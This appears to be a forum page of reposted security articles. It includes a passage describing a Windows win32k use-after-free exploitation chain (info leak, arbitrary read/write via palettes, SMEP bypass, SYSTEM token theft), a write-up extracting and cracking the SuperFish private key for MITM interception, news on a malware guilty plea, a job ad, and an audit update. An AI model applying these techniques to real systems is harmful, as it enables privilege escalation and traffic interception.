dpi value for a cursor created with CreateCursor is 0x20. By supplying 0x30 as argument, we can pass GetCursorForDim and reach the linking code which, when simplified, looks like this: CursorB->prevPointer = CursorA CursorB->nextPointer = CursorA->nextPointer CursorA->nextPointer = CursorB Here’s more information regarding the cursor object: Figure 5: Empty cursor object on the way (click to open larger image in new window) When calling CreateCursor, a new empty cursor object gets allocated through HMAllocObject, which then calls Win32AllocPool. What’s important to note here is the allocation size of 0x98 bytes and the POOL_TYPE 0x21 enumerable value that stands for “PagedPoolSession.” This information will be useful later on when utilizing this bug. Figure 6: Inside DestroyCursor (click to open larger image in new tab) The code checks whether a specific cursor flag is set. If it is not set, the function proceeds to check if the cursor has its nextPointer initialized and if so, takes the branch to the recursive DestroyCursor call. However, if the cursor flag is set, the code part on the left gets taken and there is some unlinking being performed. In the case where Cursor gets created with CreateCursor, this flag is never set. What happens in the PoC is the following: CursorA and CursorB get linked together. CursorB gets normally destroyed and freed, no unlinking is performed. CursorA gets destroyed, with the branch taken to the recursive DestroyCursor call because its nextPointer points to CursorB. Previously destroyed CursorB gets destroyed again. It is now clear that one can easily take advantage of this bug between step 2 and 3 by replacing the freed cursor object. EXPLOITATION n3phos then looked more closely into the DestroyCursor function. During this function there is a call made to CleanupCursorObject: Figure 7: Calling CleanupCursorObject If an attacker happens to control the values at offset 0x38 and offset 0x40, he can free an arbitrary object of their choice. This needs some kind of memory leak. Replacing the cursor with something useful As mentioned earlier, the cursor object gets allocated on the PagedPoolSession. This means that we have to exclude pretty much all the allocations that are used in the ntoskrnl module as a possible replacement for the cursor since they get allocated on the NonPagedPoolNx (PoolType 0x200). The small allocation size of 0x98 bytes is also a problem because most of the GDI objects are bigger than that. A possible object that would fit in would be, for example, a solid brush (0x98 bytes in size). But because it gets allocated with Win32AllocateFromPagedLookasideList, the address will never be the same as of the freed cursor. One further restriction is the need of zero reference count. The researcher decided to use a gesture info structure. Figure 8: AllocGestureInfo Like the cursor, this gesture info structure gets allocated by HMAllocObject. What really matters is that we have enough control of its members to trigger the arbitrary free in CleanupCursorObject. ulArguments is @ offset 0x38 in the cursor and needs to be nonzero; arbitraryFree @ offset 0x40 is where the leaked object address gets written. The size of this gesture info object is calculated as follows: 0x30(cbSize) + 0x40(cbExtraArgs) + 0x30 (internally) = 0xa0 bytes. (The cursor is actually 0xa0 bytes big) Leaking an object The object used to leak was a Palette object. This object can be created with the CreatePalette GDI function. It takes one logical palette as an argument: palNumEntries The number of entries in the logical palette. palPalEntry Specifies an array of PALETTEENTRY structures that define the color and usage of each entry in the logical palette. A paletteentry is basically a DWORD that defines the RGB values the palette uses and is built like that: 0x00bbggrr. The zero is a flag. If we look at the palette in memory it looks something like this: Figure 9: The palette object When the palette gets allocated, its size is calculated like this: 0x98 (which is the basic object size) + 4 * numEntries One can control the size of the palette to an extent, which will be important later on when we leak it. (Besides that, this object has some very interesting members, so if you ever happen to have a bug in GDI you might want to have one of these.) For example if you overwrite the numEntries member you can read and write out of bounds (on the PagedPool). By overwriting the palEntries pointer at offset 0x80, we can read and write anywhere. Also, the “this” pointer will be quite useful in the information leak. To read and write we just call the following from Gdi32 in userland: GetPaletteEntries (reading) SetPaletteEntries (writing) xxxBMPtoDIB To understand how the “information leak” works, we first need to know a bit more about DIBs and the Clipboard. From the MSDN description: A DIB (device-independent bitmap) is a format used to define device-independent bitmaps in various color resolutions… … A DIB is normally transported in metafiles (usually using the StretchDIBits function), BMP files, and the Clipboard (CF_DIB data format)… …The header actually consists of two adjoining parts: the header proper and the color table. Both are combined in the BITMAPINFO structure, which is what all DIB APIs expect ------------------- BITMAPINFO structure: biBitCount The number of bits-per-pixel. The biBitCount member of the BITMAPINFOHEADER defines the maximum number of colors in the bitmap. 4 The bitmap has a maximum of 16 colors, and the bmiColors member of BITMAPINFO contains up to 16 entries. 8 The bitmap has a maximum of 256 colors, and the bmiColors member of BITMAPINFO contains up to 256 entries. 16 The bitmap has a maximum of 2^16 colors. bmiColors An array of RGBQUAD (like palettentry) . The elements of the array that make up the color table. ------------------- These are the important fields. As it was mentioned in the MSDN description, the BITMAPINFO structure consists of a BITMAPINFOHEADER followed by a color table (bmiColors). The color table is just an array of integers and its maximum size is specified by the biBitCount member. Now if we create (for example) a DIB with a bit count of 4, we would need to allocate 0x68 bytes of memory, because 0x28 bytes are used for the header (biSize) and 0x40 bytes would be used for the color table (maximum number of entries * 4 = 0x10 ( 16 entries ) * 4 = 0x40 bytes) This is all we need to know about DIBs, so the next thing to look at is the clipboard. The clipboard is used by applications to transfer data between them or when you copy and paste different formats like texts and pictures and so forth. There are so-called standard clipboard formats2 that are defined by the system: To place something on the clipboard, one has to call OpenClipboard first and then make a call to SetClipboardData. This takes the format (a constant value) as a first argument and a HANDLE to the data in the specified format as a second argument. To get something from the clipboard we call GetClipboardData and pass the format we want. Another thing we need to know is that the clipboard can convert data between certain clipboard formats. If we request data in a format that is not on the clipboard, the system converts an available format to the requested format. For example if we put normal text on the clipboard and we request data in CF_UNICODETEXT format, the text gets converted to Unicode. Converting a special bitmap to a DIB, however, leads to uninitialized data being leaked. In order to reach the vulnerable function xxxBMPtoDIB in win32k there needs to be a “dummy Dib” on the clipboard. This can be achieved by: Opening the clipboard. Emptying the clipboard. Placing a bitmap handle to the clipboard. Closing the clipboard (munging the clipboard data). We then proceed with these steps to leak uninitialized data&colon; Reopen the clipboard. Place the special bitmap on the clipboard via SetClipboardData. Place some other required formats. Request data in the format of CF_DIB via GetClipboardData to convert the bitmap to DIB. We can repeat this procedure as many times as we wish. This allows us to reach a deterministic state in which the data being leaked is the same over and over again, giving us the certainty that at the leaked address will indeed be a valid object allocated. While this works, the fact that we have to use the clipboard also has some caveats. Calling CreateBitmap with these arguments is all it needs: hbm = CreateBitmap( 1, // width 1, // height 1, // planes 5, // bitsPerPel ppvBits ); Each bitmap that gets created has usually a BITMAP structure (userland) and a palette (in the kernel object) associated with it. Not in this case though; this bitmap will not have a palette associated and the fourth parameter, bitsPerPel, gets rounded up to 8 for some reason and will be saved in the BITMAP structure. When converting the bitmap to DIB, this is what happens in xxxBMPtoDIB: Figure 10: Inside xxxBMPtoDIB (click to open larger image in new window) This function takes the bitmap we put on the clipboard earlier and uses the bitsPerPel BITMAP structure member from userland to calculate the size of the DIB color table. Remembering that the maximum number of entries of a DIB with biBitCount = 8 is 256, we can calculate the size as follows: 0x100 * 4 (color table) + 0x28 (header size) + 0x4 ( imageSize )= 0x42c bytes Figure 11: More xxxBMPtoDIB action Later in xxxBMPtoDIB, the above allocated buffer gets passed to GetDIBitsInternal. GreGetDIBitsInternalWorker would be responsible for initializing the color table @ offset 0x28, but because it never reaches the code (the function fails in bIsCompatible at the beginning because the Bitmap has no palette associated with it), it is possible to leak up to 0x404 bytes of uninitialized memory since the first 0x28 bytes are initialized. This gives us enough power to read the internal object pointers of a palette and predict (or know) where the next palette gets allocated. By allocating palettes with 0xe5 entries and then deleting them again, we can force xxxBMPtoDIB to reuse the freed memory of the palette and leak the “this” pointer @ offset 0x88. 0x98 + 4 * 0xe5 = 0x42c bytes Once we have leaked the address of the target palette, we can just write it to the arbitraryFree member from the gestureInfo structure and call DestroyCursor to free the palette through CleanupCursorObject. One problem that all of these objects face is the issue that they do not get immediately freed, but instead get placed on the DeferredFreePool. This problem can be solved by allocating 32 objects of the desired size and then deleting them right after to trigger a call to nt!ExDeferredFreePool, which finally releases the object we want to replace. Figure 12: Clearing out the DeferredFreePool Replacing the palette with our fakepalette Luckily, there is a very convenient way to replace the freed palette: NtUserConvertMemHandle. This function copies the contents of a memory buffer from userland to kernelland on the PagedPool. The only thing we need to take into account is that the kernel buffer is not QWORD aligned, so the structure for the fakepalette has to be adjusted a little. The shellcode gets stored at the palette entries array @ offset 0x90 and overwrite the function pointer @ offset 0x60 to point to the array. It then executes it through NtGdiGetNearestPaletteIndex, but this doesn’t work because the PagedPool is not executable on Windows 8. This means that we have to disable SMEP first to execute our shellcode in userland. To achieve this, the report references Sebastian Apelt’s published Pwn2Own afd.sys privilege escalation write up. We have to write the address of the HalDispatchTable in our fakepalette @ offset 0x80, where the palEntries pointer resides. We can then read the function pointer at HalDispatchTable+0x18 (by GetPaletteEntries), namely nt!ArbAddReserved, to calculate the address of nt!KiConfigureDynamicProcessor and use the instructions at the end for our ROP gadget. Finally, we overwrite the QueryIntervalProfile pointer with the gadget (by SetPaletteEntries) and execute the shellcode. To recap, the provided example performed the following: Leak the address of a palette object via Clipboard format conversion. Create two Cursors, CursorA and CursorB. Call NtUserLinkDpiCursor to link the cursors together. Destroy and free CursorB via NtUserDestroyCursor. Create a gestureInfo object on the PagedSessionPool of size 0xa0 to replace the freed CursorB. Destroy and free CursorA via NtUserDestroyCursor and free the target palette through CleanupCursorObject. Call NtUserConvertMemHandle to replace the freed palette of size 0x42c. Leak nt!ArbAddReserved from HalDispatchTable to compute the rop gadget address and evade ASLR. Perform a write to nt!HalDispatchtable to overwrite the QueryIntervalProfile pointer with the gadget address from nt!KiConfigureDynamicProcessor as ROP entry point. Execute Single-Gadget-ROP to disable SMEP. Directly return from gadget to userland code and execute the shellcode. Shellcode: Replace current process token with token of the SYSTEM process. As you can see, this was quite the write up and amazing work from this researcher. Just another day at the office here at the Zero Day Initiative. Hope you enjoyed the work of this researcher as much as I did! Sursa: http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Just-another-day-at-the-office-A-ZDI-analyst-s-perspective-on/ba-p/6710637#.VOaHEXWUfHw

[h=1]Blackshades malware co-creator pleads guilty[/h]Kevin McCoy, USA TODAY 5:26 p.m. EST February 18, 2015 NEW YORK — Alex Yucel, the co-creator of the Blackshades malware that infected more than a half-million computers worldwide, pleaded guilty Wednesday in Manhattan federal court. The Swedish citizen faces up to 10 years in prison, plus thousands of dollars in forfeiture and restitution, for his role in a scheme federal investigators said distributed Blackshades to thousands of cybercriminals worldwide and harmed many computer users. In an alleged scheme that ran from 2010-2013, conspirators installed Blackshades' Remote Access Tool — RAT — on the computers of unsuspecting users. The $40 program enabled them to access and view the victims' files, documents and photos, record keystrokes, steal passwords and even use the machines' cameras to spy on users. Blackshades users often sent electronic ransom notes to extort payments from victims for releasing the computers from secret control. Prosecutors said one such note warned: "Your computer has basically been hijacked, and your private files stored on your computer has now been encrypted, which means that they are impossible to access, and can only be decrypted/restored by us." Yucel, 24, was arrested in Moldova in November 2013 and was subsequently extradited to the U.S. In an agreement with prosecutors, he pleaded guilty to one count of distributing malicious software during a 35-minute hearing before U.S. District Court Judge P. Kevin Castel. Evidence amassed by federal investigators showed Yucel hired administrators, a marketing director and customer service representatives to build his Blackshades business. The operation rang up sales to thousands of users in more than 100 countries, generating more than $350,000 by April 2014, prosecutors charged. Yucel, dressed in dark blue jail clothes, told Castel he had lived in Sweden and attended a university for two years as a computer science major. "I do actually want to plead guilty," said Yucel. "I knew that the program ... would be used to cause damage." Had he gone to trial, Manhattan Assistant U.S. Attorney Sarah Lai said the government would have introduced transcripts of electronic chats between Yucel and an undercover federal agent, Blackshades marketing material and evidence of data stolen from computers. Although Yucel faces a maximum 10-year prison term, prosecutors and defense attorney Bradley Henry reached a stipulated agreement to imprisonment from 70 to 87 months. The final decision, however, rests with Castel, who set a tentative sentencing date of May 22. Henry said he will seek authorization for Yucel to serve the prison sentence and the period of supervised release in Sweden. A ruling on that request would be decided by the Department of Justice's Office of Enforcement Operations. Michael Hogue, the other co-creator of the Blackshades RAT program, and Brendan Johnston, a former Blackshades administrator, previously pleaded guilty and are awaiting sentencing. Sursa: Blackshades malware co-creator pleads guilty Justitia pulii. Nu e corect.

[TABLE=width: 100%] [TR] [TD]IT Service Desk S.C. KPMG ROMANIA SRL[/TD] [TD=align: right][TABLE] [TR] [TD] Vezi detalii companie[/TD] [/TR] [/TABLE] [/TD] [/TR] [/TABLE] [TABLE=width: 100%] [TR] [TD][TABLE=width: 100%] [TR] [TD][TABLE=width: 100%] [TR] [TD][/TD] [TD][/TD] [TD][/TD] [/TR] [TR=class: impar] [TD=class: jd-content]Tip oferta[/TD] [TD=class: jd-logo][/TD] [TD=class: jd-content]Job[/TD] [/TR] [TR=class: par] [TD=class: jd-content]Nivel cariera[/TD] [TD=class: jd-logo][/TD] [TD=class: jd-content]Entry[/TD] [/TR] [TR] [TD=class: jd-content]Oras(e)[/TD] [TD=class: jd-logo][/TD] [TD=class: jd-content]BUCURESTI [/TD] [/TR] [TR=class: par] [TD=class: jd-content]Domenii oferta[/TD] [TD=class: jd-logo][/TD] [TD=class: jd-content]IT / Telecom [/TD] [/TR] [/TABLE] [/TD] [TD][/TD] [/TR] [/TABLE] [/TD] [/TR] [/TABLE] [TABLE=width: 100%] [TR] [TD]IMPORTANT! Thank you for your CV! In order to make sure your application will be taken into consideration, please apply also to:www.kpmg.com/ro/en/careers/careernews/pages/default.aspx Who are we? KPMG is a global network of professional services firms providing Audit, Tax and Advisory services with an industry focus. We operate in 152 countries and have more than 145,000 professionals working in member firms around the world. KPMG has been in Romania and Moldova since the early 90`s. We now operate with 800 people from six offices in Bucharest, Cluj, Timisoara, Iasi, Constanta and Chisinau and we are one of the leading professional services firms in the Romanian and Moldovan markets. What are we looking for? A team member for our IT Department. Someone with good inter-personal skills who is able to communicate easy with KPMG staff, based on his proficiency in English. The candidate should be a strong team player and possess a very good time management and task follow-up skills. Moreover, should demonstrate rigor in his daily routine while treating all staff requirements with solicitude. Job objective The overall job objective is to create an interface between the IT Department and end users in order to increase the responsiveness of the IT team to daily and ordinary assistance demands coming from staff. Provide support to staff on all company supported applications. Troubleshoot computer problems and determine source, and advice on appropriate action. Responsibilities: • Respond to requests for technical assistance in person, via phone, and email; • To assist end-users in all IT applications and equipment related issues; • Diagnose, resolve, document resolutions for future reference technical hardware and software issues; • Determine source of computer problems (hardware, software, user access, etc.) and advise staff on appropriate action; • Serve as liaison between staff and the IT department to resolve issues; • Perform hardware and software installations; • Follow standard help desk & incident management procedures: log all help desk interactions, redirect problems to appropriate resource, identify and escalate situations requiring urgent attention, track and route problems and requests and document resolutions, prepare activity reports, stay current with system information, changes and updates; • To ensure, as part of the IT team, the proper operation of all IT and Telecommunication items /equipment; • To take part in the implementation of new IT applications and/or management information systems; • To contribute to the development, improvement and implementation of new IT policies within the Firm and to monitor staff compliance; • To provide full end-user support in using customized specific IT applications; • To deliver on the spot and / or regular IT assistance to staff. Required skills: • University degree in Information Technology or related sciences; • At least 2 years prior work experience as a member of a IT team; • Relevant work experience in hardware, software & communication troubleshooting; • Knowledge of Windows 7/8, Office Application - Microsoft certification desirable; Performance standard requirements: Core Competencies defined for Infrastructure staff (link) BestJobs: http://www.bestjobs.ro/locuri-de-munca-it-service-desk/215650/2[/TD] [/TR] [/TABLE] PS: Dati-mi CV-ul daca sunteti interesati.

Extracting the SuperFish certificate By Robert Graham I extracted the certificate from the SuperFish adware and cracked the password ("komodia") that encrypted it. I discuss how down below. Note: this is probably trafficking in illegal access devices under the proposed revisions to the CFAA, so get it now before they change the law. I used ghetto reversing to find the certificate. It was really easy. As reported by others, program is packed and self-encrypted (like typical adware/malware). The proper way to reverse engineer this is to run the software in a debugger, setting break point right after it decrypts itself. The goal is to set the right break point before it actually infects your machine -- reversers have been know to infect themselves this way. The ghetto way is to just to run this on a machine, infecting yourself, and run "procdump" (by @markrussinovich) in order to dump the process's memory. That's what I did, by running the following command: procdump -am VisualDiscovery.exe super.dmp The proper reversing is to actually tear apart the memory structures. The ghetto reversing is to run strings. This is an ancient (mid-1980s) program that simple extracts human readable strings out of a binary file, discarding the rest. It's really a stupid simple program. strings super.dmp > super.txt At that point, I load the file super.txt into a text editor and searched for the string "PRIVATE KEY". Sure enough, it popped right up. It's actually located several times in the memory dump. At this point, I copied/pasted the certificate into a file super.pem. I them attempted to look at it using OpenSSL. However, I was presented with a password prompt. This file has been encrypted with a password. Okay, that's annoying, but that just means we need to crack the password. However, I can't find a password cracker on the Internet that handles SSL PEM files, so I wrote my own certificate password cracker. It's pretty ghetto, using the OpenSSL decrypt API in a single thread, so it's not pretty. But it's sufficient for my needs. The encryption is actually pretty good, meaning I can only do a couple hundred guesses per second. This means that there is no chance of brute-forcing any password longer than 5 characters (brute-force means to try all possible combinations), it'd take billions of years. Instead, I want to do a dictionary attack. This is where I load a file of common words and test them one-by-one to see if they work. I tried the small dictionary john.dict that comes with John-the-Ripper, and it didn't find anything. But of course, I don't need a real dictionary. The password is probably also in the clear in the memory dump. I could just use the file super.txt as my dictionary! I tried this, but it was taking a long time, with 150k unique lines of text. It'd take many hours to complete. To speed things up, I filtered the list for just lower-case words grep "^[a-z]$" super.txt | sort | uniq > super.dict This leaves a dictionary of only 2203 words. I ran my cracking tool, and found the password in 10 seconds, "komodia". Armed with this password, I continued where I left off with the openssl command-line tool and successfully decoded the certificate. I can now use this to Man-in-the-Middle people with Lenovo desktops (in theory, I haven't tried it yet). Note that the password "komodia" is suggestive -- that's a company that makes an SSL "redirector" for doing exactly the sort of interception that SuperFish is doing. They market it as security software so you can spy on your kids, and stuff. (BTW, thanks to @chigley101 for linking a download of the software. Also note that @supersat and @paul_pearce found the password before I did, though as far as I know they haven't published it). Sursa: http://blog.erratasec.com/2015/02/extracting-superfish-certificate.html

Another update on the Truecrypt audit There's a story on Hacker News asking what the hell is going on with the Truecrypt audit. I think that's a fair question, since we have been awfully quiet lately. To everyone who donated to the project, first accept my apologies for the slow pace. I want to promise you that we're not spending your money on tropical vacations (as appealing as that would be). In this post I'd like to offer you some news, including an explanation of why this has moved slowly. For those of you who don't know what the Truecrypt audit is: in late 2013 Kenn White, myself, and a group of advisors started aproject to undertake a crowdfunded audit of the Truecrypt disk encryption program. To the best of my knowledge, this is the first time anyone's tried this. The motivation for the audit is that lots of people use Truecrypt and depend on it for their security and safety -- yet the authors of the program are anonymous and somewhat mysterious to boot. Being anonymous and mysterious is not a crime, but it still seemed like a nice idea to take a look at their code. We had an amazing response, collecting upwards of $70,000 in donations from a huge and diverse group of donors. We then went ahead and retained iSEC Partners to evaluate the bootloader and other vulnerability-prone areas of Truecrypt. The initial report was published here. That initial effort was Part 1 of a two-part project. The second -- and much more challenging part -- involves a detailed look at the cryptography of Truecrypt, ranging from the symmetric encryption to the random number generator. We had some nice plans for this, and were well on our way to implementing them. (More on those in a second.) Then in late Spring of 2014, something bizarre happened. The Truecrypt developers pulled the plug on the entire product -- in their typical, mysterious way. This threw our plans for a loop. We had been planning a crowdsourced audit to be run by Thomas Ptacek and some others. However in the wake of TC pulling the plug, there were questions. Was this a good use of folks' time and resources? What about applying those resources to the new 'Truecrypt forks' that have sprung up (or are being developed?) There were a few other wrinkles as well, which Thomas talks about here -- although he takes on too much of the blame. It took us a while to recover from this and come up with a plan B that works within our budget and makes sense. We're now implementing this. A few weeks ago we signed a contract with the newly formed NCC Group's Cryptography Services practice (which grew out of iSEC, Matasano and Intrepidus Group). The project will evaluate the original Truecrypt 7.1a which serves as a baseline for the newer forks, and it will begin shortly. However to minimize price -- and make your donations stretch farther -- we allowed the start date to be a bit flexible, which is why we don't have results yet. In our copious spare time we've also been looking manually at some portions of the code, including the Truecrypt RNG and other parts of the cryptographic implementation. This will hopefully complement the NCC/iSEC work and offer a bit more confidence in the implementation. I don't really have much more to say -- except to thank all of the donors for their contributions and their patience. This project has been a bit slower than any of us would like, but results are coming. Personally, my hope is that they'll be completely boring. Posted by Matthew Green at 4:17 PM Sursa: http://blog.cryptographyengineering.com/2015/02/another-update-on-truecrypt-audit.html

When Cryptographic API Design Goes Wrong February 18, 2015 Ionu? Ambrosie Whether we like to admit it or not, failing to account for human factors and usability issues when designing secure systems can have unwanted consequences. And while Security Usability is a broad field, today I’d like to focus on what I like to call the [lack of] usability of [some] cryptographic APIs. A paper on SSL Certificate Validation To get my point across, I’d like to bring forth a paper written in 2012 by Martin Georgiev, Subodh Iyengar, Suman Jana, Rishita Anubhai, Dan Boneh, and Vitaly Shmatikov, called The Most Dangerous Code in the World: Validating SSL Certificates in Non-Browser Software.In this paper, the authors claim and empirically confirm that SSL certificate validation is completely broken in many security-critical applications and libraries, meaning that any SSL connection initiated from any of these applications and libraries is insecure against a man-in-the-middle attack.They credit these vulnerabilities to badly designed APIs of SSL implementations and data-transport libraries, which present developers with a confusing array of settings and options. Articol complet: http://securitycafe.ro/2015/02/18/when-cryptographic-api-design-goes-wrong/

E pentru "siguranta noastra"